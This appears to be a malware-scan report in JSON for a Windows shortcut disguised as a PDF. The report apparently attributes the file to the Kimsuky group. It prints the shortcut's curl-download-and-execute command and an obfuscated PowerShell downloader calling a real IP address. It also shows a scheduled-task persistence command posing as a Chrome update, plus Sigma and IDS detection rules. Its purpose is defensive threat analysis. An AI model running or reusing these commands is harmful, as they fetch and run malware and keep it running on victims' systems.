"CommandLine": "powershell powershell{$tiger = \\\"(Njwfiglmgew-rwgwrgObjerwgwrgct Neergeft.WebCrwgwrgliesUuiiant).\\\";$bear = \\\"Do Have ownlight in Spring(\\\";$puma = \\\"'http://103.67.196.25//view1.php?type=apple&seed=\\\";$bom=getmac;$bom=$bom[3].substring(0,17);$puma=$puma+$bom;$puma=$puma+\\\"')\\\";$tiger = $tiger.Replace(\\\"jwfiglmg\\\", \\\"\\\");$bear = $bear.Replace(\\\" Have o\\\", \\\"\\\");$tiger = $tiger.Replace(\\\"rwgwrg\\\", \\\"\\\");$bear = $bear.Replace(\\\"ight in \\\",\\\"oad\\\");$tiger = $tiger.Replace(\\\"ergef\\\", \\\"\\\");$bear = $ [TRUNCATED]",
"FileVersion": "10.0.22621.2361 (WinBuild.160101.0800)",
"ParentImage": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe",
"IntegrityLevel": "High",
"Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
"Company": "Microsoft Corporation"
}
},
{
"values": {
"Product": "Microsoft\\xae Windows\\xae Operating System",
"CurrentDirectory": "C:\\Windows\\system32\\",
"OriginalFileName": "PowerShell.EXE",
"Hashes": "MD5=04029E121A0CFA5991749937DD22A1D9,SHA256=9F914D42706FE215501044ACD85A32D58AAEF1419D404FDDFA5D3B48F66CCD9F,IMPHASH=7C955A0ABC747F57CCC4324480737EF7",
"Description": "Windows PowerShell",
"EventID": "1",
"ParentCommandLine": "C:\\Windows\\system32\\wbem\\wmiprvse.exe -secured -Embedding",
"CommandLine": "powershell powershell{$tiger = \\\"(Njwfiglmgew-rwgwrgObjerwgwrgct Neergeft.WebCrwgwrgliesUuiiant).\\\";$bear = \\\"Do Have ownlight in Spring(\\\";$puma = \\\"'http://103.67.196.25//view1.php?type=apple&seed=\\\";$bom=getmac;$bom=$bom[3].substring(0,17);$puma=$puma+$bom;$puma=$puma+\\\"')\\\";$tiger = $tiger.Replace(\\\"jwfiglmg\\\", \\\"\\\");$bear = $bear.Replace(\\\" Have o\\\", \\\"\\\");$tiger = $tiger.Replace(\\\"rwgwrg\\\", \\\"\\\");$bear = $bear.Replace(\\\"ight in \\\",\\\"oad\\\");$tiger = $tiger.Replace(\\\"ergef\\\", \\\"\\\");$bear = $ [TRUNCATED]",
"FileVersion": "10.0.19041.546 (WinBuild.160101.0800)",
"ParentImage": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe",
"IntegrityLevel": "High",
"Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
"Company": "Microsoft Corporation"
}
}
]
},
{
"rule_level": "medium",
"rule_id": "884b7e21f67a56fc9cb312bdbc27e658c101c449662b2f9e25fd463a75715971",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "Registry Tampering by Potentially Suspicious Processes",
"rule_description": "Detects suspicious registry modifications made by suspicious processes such as script engine processes such as WScript, or CScript etc.\nThese processes are rarely used for legitimate registry modifications, and their activity may indicate an attempt to modify the registry\nwithout using standard tools like regedit.exe or reg.exe, potentially for evasion and persistence.\n",
"rule_author": "Swachchhanda Shrawan Poudel (Nextron Systems)",
"match_context": [
{
"values": {
"EventType": "SetValue",
"EventID": "13",
"Image": "C:\\Windows\\SysWOW64\\WScript.exe",
"Details": "QWORD (0x00000000-0x000708f6)",
"TargetObject": "HKU\\S-1-5-21-1070296143-2877979003-364783958-1001\\Software\\Microsoft\\Windows Script\\Settings\\Telemetry\\wscript.exe\\VBScriptSetScriptStateStarted"
}
}
]
},
{
"rule_level": "medium",
"rule_id": "eb75f9de2201bfad4ef177dca85b0b8fa8e5a86ba2357af5301f72acbc5eb144",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "Suspicious Execution of Powershell with Base64",
"rule_description": "Commandline to launch powershell with a base64 payload",
"rule_author": "frack113",
"match_context": [
{
"values": {
"Product": "Microsoft\\xae Windows\\xae Operating System",
"CurrentDirectory": "C:\\Windows\\system32\\",
"OriginalFileName": "PowerShell.EXE",
"Hashes": "MD5=04029E121A0CFA5991749937DD22A1D9,SHA256=9F914D42706FE215501044ACD85A32D58AAEF1419D404FDDFA5D3B48F66CCD9F,IMPHASH=7C955A0ABC747F57CCC4324480737EF7",
"Description": "Windows PowerShell",
"EventID": "1",
"ParentCommandLine": "powershell powershell{$tiger = \\\"(Njwfiglmgew-rwgwrgObjerwgwrgct Neergeft.WebCrwgwrgliesUuiiant).\\\";$bear = \\\"Do Have ownlight in Spring(\\\";$puma = \\\"'http://103.67.196.25//view1.php?type=apple&seed=\\\";$bom=getmac;$bom=$bom[3].substring(0,17);$puma=$puma+$bom;$puma=$puma+\\\"')\\\";$tiger = $tiger.Replace(\\\"jwfiglmg\\\", \\\"\\\");$bear = $bear.Replace(\\\" Have o\\\", \\\"\\\");$tiger = $tiger.Replace(\\\"rwgwrg\\\", \\\"\\\");$bear = $bear.Replace(\\\"ight in \\\",\\\"oad\\\");$tiger = $tiger.Replace(\\\"ergef\\\", \\\"\\\");$bear = $ [TRUNCATED]",
"CommandLine": "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -encodedCommand JAB0AGkAZwBlAHIAIAA9ACAAIgAoAE4AagB3AGYAaQBnAGwAbQBnAGUAdwAtAHIAdwBnAHcAcgBnAE8AYgBqAGUAcgB3AGcAdwByAGcAYwB0ACAATgBlAGUAcgBnAGUAZgB0AC4AVwBlAGIAQwByAHcAZwB3AHIAZwBsAGkAZQBzAFUAdQBpAGkAYQBuAHQAKQAuACIAOwAkAGIAZQBhAHIAIAA9ACAAIgBEAG8AIABIAGEAdgBlACAAbwB3AG4AbABpAGcAaAB0ACAAaQBuACAAUwBwAHIAaQBuAGcAKAAiADsAJABwAHUAbQBhACAAPQAgACIAJwBoAHQAdABwADoALwAvADEAMAAzAC4ANgA3AC4AMQA5ADYALgAyADUALwAvAHYAaQBlAHcAMQAuAHAAaABwAD8AdAB5AHAA [TRUNCATED]",
"FileVersion": "10.0.19041.546 (WinBuild.160101.0800)",
"ParentImage": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
"IntegrityLevel": "High",
"Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
"Company": "Microsoft Corporation"
}
}
]
},
{
"rule_level": "medium",
"rule_id": "eb80a13f018daf47775fec9d5aaf6173f1ad3ed6a71702583f0bbb2feabc66f4",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "File Download From IP URL Via Curl.EXE",
"rule_description": "Detects file downloads directly from IP address URL using curl.exe",
"rule_author": "Nasreddine Bencherchali (Nextron Systems)",
"match_context": [
{
"values": {
"Product": "The curl executable",
"CurrentDirectory": "C:\\Users\\Bruno\\Desktop\\",
"OriginalFileName": "curl.exe",
"Hashes": "SHA1=59E081BED369AC6034F628C64B8A73531BEDB6E2,MD5=DBD30D70FCDAE1FD343DDAD5C55C4E78,SHA256=E6F66D659242AA7D6DD3C1967714C6CD3E0B11AAA235E7F7A150A3316DAE8E61,IMPHASH=66E86C833873DBB82BDB3D7F9BBE6DC9",
"Description": "The curl executable",
"FileVersion": "8.0.1",
"ParentCommandLine": "\"C:\\Windows\\SysWOW64\\cmd.exe\" /c mode 15,1 & curl http://103.67.196.25/conf.dat -o c:\\users\\public\\music\\ant.vbe & c:\\users\\public\\music\\ant.vbe & exit",
"CommandLine": "curl http://103.67.196.25/conf.dat -o c:\\users\\public\\music\\ant.vbe ",
"EventID": "1",
"ParentImage": "C:\\Windows\\SysWOW64\\cmd.exe",
"IntegrityLevel": "High",
"Image": "C:\\Windows\\SysWOW64\\curl.exe",
"Company": "curl, https://curl.se/"
}
}
]
},
{
"rule_level": "medium",
"rule_id": "f92451c8957e89bb4e61e68433faeb8d7c1461c3b90d06b3403c8f3d87c728b8",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "Usage Of Web Request Commands And Cmdlets",
"rule_description": "Detects the use of various web request commands with commandline tools and Windows PowerShell cmdlets (including aliases) via CommandLine",
"rule_author": "James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger",
"match_context": [
{
"values": {
"Product": "Microsoft\\xae Windows\\xae Operating System",
"CurrentDirectory": "C:\\Users\\Bruno\\Desktop\\",
"OriginalFileName": "Cmd.Exe",
"Hashes": "SHA1=E563BAE25E3C011A1E69B4636C9B29B5661C460A,MD5=89B5A70BF37A93015F4845BF901B7825,SHA256=678652BB50ABB92DE91A69C05EA018C160FB4BE0902ACE14B15749246788CB40,IMPHASH=FD97AFEC4DC549DCD1FE1DAD15035DF9",
"Description": "Windows Command Processor",
"FileVersion": "10.0.22621.1635 (WinBuild.160101.0800)",
"ParentCommandLine": "C:\\Windows\\Explorer.EXE",
"CommandLine": "\"C:\\Windows\\SysWOW64\\cmd.exe\" /c mode 15,1 & curl http://103.67.196.25/conf.dat -o c:\\users\\public\\music\\ant.vbe & c:\\users\\public\\music\\ant.vbe & exit",
"EventID": "1",
"ParentImage": "C:\\Windows\\explorer.exe",
"IntegrityLevel": "High",
"Image": "C:\\Windows\\SysWOW64\\cmd.exe",
"Company": "Microsoft Corporation"
}
},
{
"values": {
"Product": "The curl executable",
"CurrentDirectory": "C:\\Users\\Bruno\\Desktop\\",
"OriginalFileName": "curl.exe",
"Hashes": "SHA1=59E081BED369AC6034F628C64B8A73531BEDB6E2,MD5=DBD30D70FCDAE1FD343DDAD5C55C4E78,SHA256=E6F66D659242AA7D6DD3C1967714C6CD3E0B11AAA235E7F7A150A3316DAE8E61,IMPHASH=66E86C833873DBB82BDB3D7F9BBE6DC9",
"Description": "The curl executable",
"EventID": "1",
"ParentCommandLine": "\"C:\\Windows\\SysWOW64\\cmd.exe\" /c mode 15,1 & curl http://103.67.196.25/conf.dat -o c:\\users\\public\\music\\ant.vbe & c:\\users\\public\\music\\ant.vbe & exit",
"CommandLine": "curl http://103.67.196.25/conf.dat -o c:\\users\\public\\music\\ant.vbe ",
"FileVersion": "8.0.1",
"ParentImage": "C:\\Windows\\SysWOW64\\cmd.exe",
"IntegrityLevel": "High",
"Image": "C:\\Windows\\SysWOW64\\curl.exe",
"Company": "curl, https://curl.se/"
}
},
{
"values": {
"CommandLine": "C:\\Windows\\SysWOW64\\cmd.exe /c mode 15,1 & curl http://103.67.196.25/conf.dat -o c:\\users\\public\\music\\ant.vbe & c:\\users\\public\\music\\ant.vbe & exit",
"Image": "C:\\Windows\\SysWOW64\\cmd.exe",
"EventID": "1"
}
},
{
"values": {
"CommandLine": "C:\\Windows\\SysWOW64\\cmd.exe\" /c mode 15,1 & curl http://103.67.196.25/conf.dat -o c:\\users\\public\\music\\ant.vbe & c:\\users\\public\\music\\ant.vbe & exit",
"Image": "C:\\Windows\\SysWOW64\\cmd.exe",
"EventID": "1"
}
}
]
},
{
"rule_level": "low",
"rule_id": "1c2e4db94ca79f939e94e29c04fb3b71467fc6f5b9c31db34fcce5a2fb3b856f",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "Non Interactive PowerShell Process Spawned",
"rule_description": "Detects non-interactive PowerShell activity by looking at the \"powershell\" process with a non-user GUI process such as \"explorer.exe\" as a parent.",
"rule_author": "Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements)",
"match_context": [
{
"values": {
"Product": "Microsoft\\xae Windows\\xae Operating System",
"CurrentDirectory": "C:\\Windows\\system32\\",
"OriginalFileName": "PowerShell.EXE",
"Hashes": "SHA1=A72C41316307889E43FE8605A0DCA4A72E72A011,MD5=DCAADF7C9610B5EBEBDEDB1569EC4A9D,SHA256=D783BA6567FAF10FDFF2D0EA3864F6756862D6C733C7F4467283DA81AEDC3A80,IMPHASH=E09C4F82A1DA13A09F4FF2E625FEBA20",
"Description": "Windows PowerShell",
"EventID": "1",
"ParentCommandLine": "C:\\Windows\\system32\\wbem\\wmiprvse.exe",
"CommandLine": "powershell powershell{$tiger = \\\"(Njwfiglmgew-rwgwrgObjerwgwrgct Neergeft.WebCrwgwrgliesUuiiant).\\\";$bear = \\\"Do Have ownlight in Spring(\\\";$puma = \\\"'http://103.67.196.25//view1.php?type=apple&seed=\\\";$bom=getmac;$bom=$bom[3].substring(0,17);$puma=$puma+$bom;$puma=$puma+\\\"')\\\";$tiger = $tiger.Replace(\\\"jwfiglmg\\\", \\\"\\\");$bear = $bear.Replace(\\\" Have o\\\", \\\"\\\");$tiger = $tiger.Replace(\\\"rwgwrg\\\", \\\"\\\");$bear = $bear.Replace(\\\"ight in \\\",\\\"oad\\\");$tiger = $tiger.Replace(\\\"ergef\\\", \\\"\\\");$bear = $ [TRUNCATED]",
"FileVersion": "10.0.22621.2361 (WinBuild.160101.0800)",
"ParentImage": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe",
"IntegrityLevel": "High",
"Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
"Company": "Microsoft Corporation"
}
},
{
"values": {
"Hashes": "MD5=04029E121A0CFA5991749937DD22A1D9,SHA256=9F914D42706FE215501044ACD85A32D58AAEF1419D404FDDFA5D3B48F66CCD9F,IMPHASH=7C955A0ABC747F57CCC4324480737EF7",
"CurrentDirectory": "C:\\Windows\\system32\\",
"OriginalFileName": "PowerShell.EXE",
"Product": "Microsoft\\xae Windows\\xae Operating System",
"Description": "Windows PowerShell",
"FileVersion": "10.0.19041.546 (WinBuild.160101.0800)",
"ParentCommandLine": "C:\\Windows\\system32\\wbem\\wmiprvse.exe -secured -Embedding",
"CommandLine": "powershell powershell{$tiger = \\\"(Njwfiglmgew-rwgwrgObjerwgwrgct Neergeft.WebCrwgwrgliesUuiiant).\\\";$bear = \\\"Do Have ownlight in Spring(\\\";$puma = \\\"'http://103.67.196.25//view1.php?type=apple&seed=\\\";$bom=getmac;$bom=$bom[3].substring(0,17);$puma=$puma+$bom;$puma=$puma+\\\"')\\\";$tiger = $tiger.Replace(\\\"jwfiglmg\\\", \\\"\\\");$bear = $bear.Replace(\\\" Have o\\\", \\\"\\\");$tiger = $tiger.Replace(\\\"rwgwrg\\\", \\\"\\\");$bear = $bear.Replace(\\\"ight in \\\",\\\"oad\\\");$tiger = $tiger.Replace(\\\"ergef\\\", \\\"\\\");$bear = $ [TRUNCATED]",
"EventID": "1",
"ParentImage": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe",
"IntegrityLevel": "High",
"Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
"Company": "Microsoft Corporation"
}
},
{
"values": {
"Product": "Microsoft\\xae Windows\\xae Operating System",
"CurrentDirectory": "C:\\Windows\\system32\\",
"OriginalFileName": "PowerShell.EXE",
"Hashes": "MD5=04029E121A0CFA5991749937DD22A1D9,SHA256=9F914D42706FE215501044ACD85A32D58AAEF1419D404FDDFA5D3B48F66CCD9F,IMPHASH=7C955A0ABC747F57CCC4324480737EF7",
"Description": "Windows PowerShell",
"EventID": "1",
"ParentCommandLine": "powershell powershell{$tiger = \\\"(Njwfiglmgew-rwgwrgObjerwgwrgct Neergeft.WebCrwgwrgliesUuiiant).\\\";$bear = \\\"Do Have ownlight in Spring(\\\";$puma = \\\"'http://103.67.196.25//view1.php?type=apple&seed=\\\";$bom=getmac;$bom=$bom[3].substring(0,17);$puma=$puma+$bom;$puma=$puma+\\\"')\\\";$tiger = $tiger.Replace(\\\"jwfiglmg\\\", \\\"\\\");$bear = $bear.Replace(\\\" Have o\\\", \\\"\\\");$tiger = $tiger.Replace(\\\"rwgwrg\\\", \\\"\\\");$bear = $bear.Replace(\\\"ight in \\\",\\\"oad\\\");$tiger = $tiger.Replace(\\\"ergef\\\", \\\"\\\");$bear = $ [TRUNCATED]",
"CommandLine": "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -encodedCommand JAB0AGkAZwBlAHIAIAA9ACAAIgAoAE4AagB3AGYAaQBnAGwAbQBnAGUAdwAtAHIAdwBnAHcAcgBnAE8AYgBqAGUAcgB3AGcAdwByAGcAYwB0ACAATgBlAGUAcgBnAGUAZgB0AC4AVwBlAGIAQwByAHcAZwB3AHIAZwBsAGkAZQBzAFUAdQBpAGkAYQBuAHQAKQAuACIAOwAkAGIAZQBhAHIAIAA9ACAAIgBEAG8AIABIAGEAdgBlACAAbwB3AG4AbABpAGcAaAB0ACAAaQBuACAAUwBwAHIAaQBuAGcAKAAiADsAJABwAHUAbQBhACAAPQAgACIAJwBoAHQAdABwADoALwAvADEAMAAzAC4ANgA3AC4AMQA5ADYALgAyADUALwAvAHYAaQBlAHcAMQAuAHAAaABwAD8AdAB5AHAA [TRUNCATED]",
"FileVersion": "10.0.19041.546 (WinBuild.160101.0800)",
"ParentImage": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
"IntegrityLevel": "High",
"Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
"Company": "Microsoft Corporation"
}
},
{
"values": {
"CommandLine": "%WINDIR%\\system32\\windowspowershell\\v1.0\\powershell.exe",
"Image": "C:\\Windows\\system32\\windowspowershell\\v1.0\\powershell.exe",
"EventID": "1"
}
}
]
},
{
"rule_level": "low",
"rule_id": "3bc9d14114a6b67367a24df21134d0564d6f08a0ad903d68f9b25e9d8b7f0790",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "Scheduled Task Creation Via Schtasks.EXE",
"rule_description": "Detects the creation of scheduled tasks by user accounts via the \"schtasks\" utility.",
"rule_author": "Florian Roth (Nextron Systems)",
"match_context": [
{
"values": {
"Product": "Microsoft\\xae Windows\\xae Operating System",
"CurrentDirectory": "C:\\Windows\\system32\\",
"OriginalFileName": "schtasks.exe",
"Hashes": "MD5=796B784E98008854C27F4B18D287BA30,SHA256=356280CCA63CA5E887FDBE5CB4105A53341FBAC9219EFC51621DF9BA8EE9838B,IMPHASH=ECCE05491F2E8F279F4790BCB1318C05",
"Description": "Task Scheduler Configuration Tool",
"FileVersion": "10.0.19041.906 (WinBuild.160101.0800)",
"ParentCommandLine": "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -encodedCommand JAB0AGkAZwBlAHIAIAA9ACAAIgAoAE4AagB3AGYAaQBnAGwAbQBnAGUAdwAtAHIAdwBnAHcAcgBnAE8AYgBqAGUAcgB3AGcAdwByAGcAYwB0ACAATgBlAGUAcgBnAGUAZgB0AC4AVwBlAGIAQwByAHcAZwB3AHIAZwBsAGkAZQBzAFUAdQBpAGkAYQBuAHQAKQAuACIAOwAkAGIAZQBhAHIAIAA9ACAAIgBEAG8AIABIAGEAdgBlACAAbwB3AG4AbABpAGcAaAB0ACAAaQBuACAAUwBwAHIAaQBuAGcAKAAiADsAJABwAHUAbQBhACAAPQAgACIAJwBoAHQAdABwADoALwAvADEAMAAzAC4ANgA3AC4AMQA5ADYALgAyADUALwAvAHYAaQBlAHcAMQAuAHAAaABwAD8AdAB5AHAA [TRUNCATED]",
"CommandLine": "\"C:\\Windows\\system32\\schtasks.exe\" /create /TN Chrome_Update /TR \"C:\\Windows\\System32\\wscript.exe /b \"C:\\users\\public\\music\\ant.vbe\"\" /SC MINUTE /mo 15 /f",
"EventID": "1",
"ParentImage": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
"IntegrityLevel": "High",
"Image": "C:\\Windows\\System32\\schtasks.exe",
"Company": "Microsoft Corporation"
}
}
]
}
],
"md5": "b3c90f52e4b86a94ec637fee4354bb84",
"sha256": "169586b6eb36b17520ef5afd206da86c4de89eb01d6294ba9631414271ba752f",
"lnk_info": {
"volume_serial_number": "16eb-b198",
"modification_date": "2021-05-08T08:14:00.923201Z",
"link_flags": [
"HasTargetIDList",
"HasLinkInfo",
"HasRelativePath",
"IsUnicode",
"EnableTargetMetadata",
"HasArguments",
"HasIconLocation"
],
"local_path": "C:\\Windows\\SysWOW64\\cmd.exe",
"machine_id": "win-n10se95a1ib",
"command_line_arguments": "/c mode 15,1 & curl http://103.67.196.25/conf.dat -o c:\\users\\public\\music\\ant.vbe & c:\\users\\public\\music\\ant.vbe & exit\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000",
"icon_location": ".pdf",
"creation_date": "2021-05-08T08:14:00.923201Z",
"target_path": "My Computer (Computer) : C:\\Windows\\SysWOW64\\cmd.exe",
"header": {
"show_window": 1,
"file_size": 250880,
"hot_key": "(0+0)",
"show_window_str": "SW_NORMAL"
},
"relative_path": "..\\..\\..\\Windows\\SysWOW64\\cmd.exe",
"mac_vendor_name": "Unknown (0x7cc255)",
"mac_address": "7c:c2:55:75:de:bd",
"link_target_id_list": [
{
"item_type": 31,
"item_type_str": "CLSID_ShellDesktop",
"clsid": "20d04fe0-3aea-1069-a2d8-08002b30309d"
}
],
"access_date": "2021-05-08T08:14:00.923201Z",
"extra_data": {
"dlt_properties": {
"birth_droid_file_id": "061b897d-1c48-11f1-9338-7cc25575debd",
"droid_file_id": "061b897d-1c48-11f1-9338-7cc25575debd",
"birth_droid_volume_id": "80246616-db4c-471f-9a06-1957a834d5f2",
"droid_volume_id": "80246616-db4c-471f-9a06-1957a834d5f2"
}
}
},
"first_submission_date": 1775246604,
"tlsh": "T14392F0116AD51771D3B6893B44B6A380AA32BD86FC675B4F4190334C3C70A18DC64FAE",
"size": 20398,
"meaningful_name": "2026 4th K-ICTC Information.pdf.lnk",
"last_modification_date": 1779799817,
"vhash": "a903eaf76af17fbf30011c85b35ff86e",
"last_submission_date": 1777528398,
"tags": [
"executes-dropped-file",
"lnk",
"url-pattern",
"long-command-line-arguments"
],
"ssdeep": "24:8pLJUmkzGvFATz+ssFaFoBcT+C47XCx3+P/WxlDRJuY+swmgdpJ:8cmCwubmeg7XChqSPuYrw7pJ",
"unique_sources": 4,
"sha1": "95cc996705f5fb8d7947615269101fb4621306d9",
"names": [
"2026 4th K-ICTC Information.pdf.lnk",
"_169586b6eb36b17520ef5afd206da86c4de89eb01d6294ba9631414271ba752f.lnk",
"2026 4th K-ICTC Information.pdf.bin",
"pvhhka.exe"
],
"crowdsourced_ids_results": [
{
"rule_category": "policy-violation",
"alert_severity": "high",
"rule_msg": "POLICY-OTHER HTTP request by IPv4 address attempt",
"rule_id": "1:50447",
"rule_source": "Snort registered user ruleset",
"rule_url": "https://www.snort.org/downloads/#rule-downloads",
"rule_raw": "alert tcp any any -> any $HTTP_PORTS ( msg:\"POLICY-OTHER HTTP request by IPv4 address attempt\"; flow:to_server,established; http_header; content:\"Host:\",fast_pattern,nocase; pcre:\"/^Host\\x3a\\s*(?:(?:25[0-5]|2[0-4][0-9]|[01]?[0-9]?[0-9])\\.){3}(?:25[0-5]|2[0-4][0-9]|[01]?[0-9]?[0-9])\\s*:?\\s*\\d*\\s*$/ims\"; service:http; reference:url,www.w3.org/Protocols/rfc2616/rfc2616-sec15.html; classtype:policy-violation; sid:50447; rev:1; )",
"rule_references": [
"https://www.w3.org/Protocols/rfc2616/rfc2616-sec15.html"
],
"alert_context": [
{
"dest_ip": "103.67.196.25",
"dest_port": 80
}
]
},
{
"rule_category": "Misc activity",
"alert_severity": "low",
"rule_msg": "ET INFO Microsoft Script Encoder Encoded File",
"rule_id": "1:2017282",
"rule_source": "Proofpoint Emerging Threats Open",
"rule_url": "https://rules.emergingthreats.net/",
"rule_raw": "alert http $EXTERNAL_NET any -> $HOME_NET any (msg:\"ET INFO Microsoft Script Encoder Encoded File\"; flow:established,from_server; file_data; content:\"#@~^\"; within:4; classtype:misc-activity; sid:2017282; rev:4; metadata:attack_target Client_and_Server, created_at 2013_08_07, deployment Perimeter, confidence High, signature_severity Informational, updated_at 2023_04_20; target:dest_ip;)",
"alert_context": [
{
"src_ip": "103.67.196.25",
"src_port": 80,
"hostname": "103.67.196.25",
"url": "http://103.67.196.25/conf.dat"
}
]
},
{
"rule_category": "Potentially Bad Traffic",
"alert_severity": "low",
"rule_msg": "ET HUNTING curl User-Agent to Dotted Quad",
"rule_id": "1:2034567",
"rule_source": "Proofpoint Emerging Threats Open",
"rule_url": "https://rules.emergingthreats.net/",
"rule_raw": "alert http $HOME_NET any -> $EXTERNAL_NET any (msg:\"ET HUNTING curl User-Agent to Dotted Quad\"; flow:established,to_server; http.user_agent; content:\"curl/\"; startswith; nocase; fast_pattern; http.host; pcre:\"/^\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}$/\"; classtype:bad-unknown; sid:2034567; rev:1; metadata:attack_target Client_Endpoint, created_at 2021_12_01, deployment Perimeter, confidence Medium, signature_severity Informational, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2021_12_01;)",
"alert_context": [
{
"dest_ip": "103.67.196.25",
"dest_port": 80,
"hostname": "103.67.196.25",
"url": "http://103.67.196.25/conf.dat"
}
]
},
{
"rule_category": "Potentially Bad Traffic",
"alert_severity": "low",
"rule_msg": "ET HUNTING schtasks create Command in HTTP Body Response",
"rule_id": "1:2064542",
"rule_source": "Proofpoint Emerging Threats Open",
"rule_url": "https://rules.emergingthreats.net/",
"rule_raw": "alert http $EXTERNAL_NET any -> $HOME_NET any (msg:\"ET HUNTING schtasks create Command in HTTP Body Response\"; flow:established,to_client; http.stat_code; content:\"200\"; http.response_body; content:\"schtasks\"; fast_pattern; nocase; pcre:\"/^.*?\\x2fcreate.*?\\x2f(?:sc|tn)/Ri\"; reference:url,learn.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks; classtype:bad-unknown; sid:2064542; rev:1; metadata:affected_product Windows_XP_Vista_7_8_10_Server_32_64_Bit, affected_product Windows_11, attack_target Client_and_Server, tls_state plaintext, created_at 2025_09_11, deployment Perimeter, performance_impact Low, confidence High, signature_severity Major, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2025_09_11, mitre_tactic_id TA0002, mitre_tactic_name Execution, mitre_technique_id T1059, mitre_technique_name Command_And_Scripting_Interpreter; target:dest_ip;)",
"rule_references": [
"https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks"
],
"alert_context": [
{
"src_ip": "103.67.196.25",
"src_port": 80,
"hostname": "103.67.196.25",
"url": "http://103.67.196.25/view1.php?type=apple&seed=14-D8-64-B8-0F-9E"
}
]
},
{
"rule_category": "Potentially Bad Traffic",
"alert_severity": "low",
"rule_msg": "TGI HUNT Curl to Bare IP Address",
"rule_id": "1:2610804",
"rule_source": "Travis Green: Threat hunting rules",
"rule_url": "https://raw.githubusercontent.com/travisbgreen/hunting-rules/master/hunting.rules",
"rule_raw": "alert http $HOME_NET any -> $EXTERNAL_NET any (msg:\"TGI HUNT Curl to Bare IP Address\"; flow:established,to_server; http.user_agent; content:\"curl/\"; startswith; nocase; fast_pattern; http.host; pcre:\"/^\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}$/\"; classtype:bad-unknown; sid:2610804; rev:1;)",
"alert_context": [
{
"dest_ip": "103.67.196.25",
"dest_port": 80,
"hostname": "103.67.196.25",
"url": "http://103.67.196.25/conf.dat"
}
]
}
],
"filecondis": {
"dhash": "e0e8a00000000080",
"raw_md5": "f22e0cba2e6f867bd00caf903b323a52"
},
"popular_threat_classification": {
"popular_threat_name": [
{
"value": "genbadur",
"count": 5
},
{
"value": "downlnk",
"count": 2
},
{
"value": "kimsuky",
"count": 2
}
],
"suggested_threat_label": "trojan.genbadur/downlnk",
"popular_threat_category": [
{
"value": "trojan",
"count": 21
},
{
"value": "downloader",
"count": 6
}
]
},
"crowdsourced_ids_stats": {
"high": 1,
"medium": 0,
"low": 4,
"info": 0
},
"last_analysis_date": 1779792444,
"sigma_analysis_stats": {
"critical": 1,
"high": 9,
"medium": 7,
"low": 2
},
"type_tag": "lnk",
"trid": [
{
"file_type": "Windows Shortcut",
"probability": 100.0
}
],
"magika": "LNK",
"last_analysis_results": {
"Bkav": {
"method": "blacklist",
"engine_name": "Bkav",
"engine_version": "8.2.40(8338)",
"engine_update": "20260525",
"category": "undetected",
"result": null
},
"Lionic": {
"method": "blacklist",
"engine_name": "Lionic",
"engine_version": "8.16",
"engine_update": "20260526",
"category": "malicious",
"result": "Trojan.WinLNK.GenBadur.4!c"
},
"MicroWorld-eScan": {
"method": "blacklist",
"engine_name": "MicroWorld-eScan",
"engine_version": "14.0.409.0",
"engine_update": "20260526",
"category": "malicious",
"result": "Trojan.GenericKD.79850702"
},
"ClamAV": {
"method": "blacklist",
"engine_name": "ClamAV",
"engine_version": "1.5.2.0",
"engine_update": "20260526",
"category": "undetected",
"result": null
},
"CMC": {
"method": "blacklist",
"engine_name": "CMC",
"engine_version": "2.4.2022.1",
"engine_update": "20260526",
"category": "undetected",
"result": null
},
"CAT-QuickHeal": {
"method": "blacklist",
"engine_name": "CAT-QuickHeal",
"engine_version": "22.00",
"engine_update": "20260525",
"category": "undetected",
"result": null
},
"Skyhigh": {
"method": "blacklist",
"engine_name": "Skyhigh",
"engine_version": "v2021.2.0+4045",
"engine_update": "20260525",
"category": "malicious",
"result": "LNK/Downloader.hbu"
},
"ALYac": {
"method": "blacklist",
"engine_name": "ALYac",
"engine_version": "2.0.0.10",
"engine_update": "20260526",
"category": "malicious",
"result": "Trojan.Agent.LNK.Gen"
},
"Malwarebytes": {
"method": "blacklist",
"engine_name": "Malwarebytes",
"engine_version": "3.1.0.235",
"engine_update": "20260526",
"category": "undetected",
"result": null
},
"Zillya": {
"method": "blacklist",
"engine_name": "Zillya",
"engine_version": "2.0.0.5608",
"engine_update": "20260525",
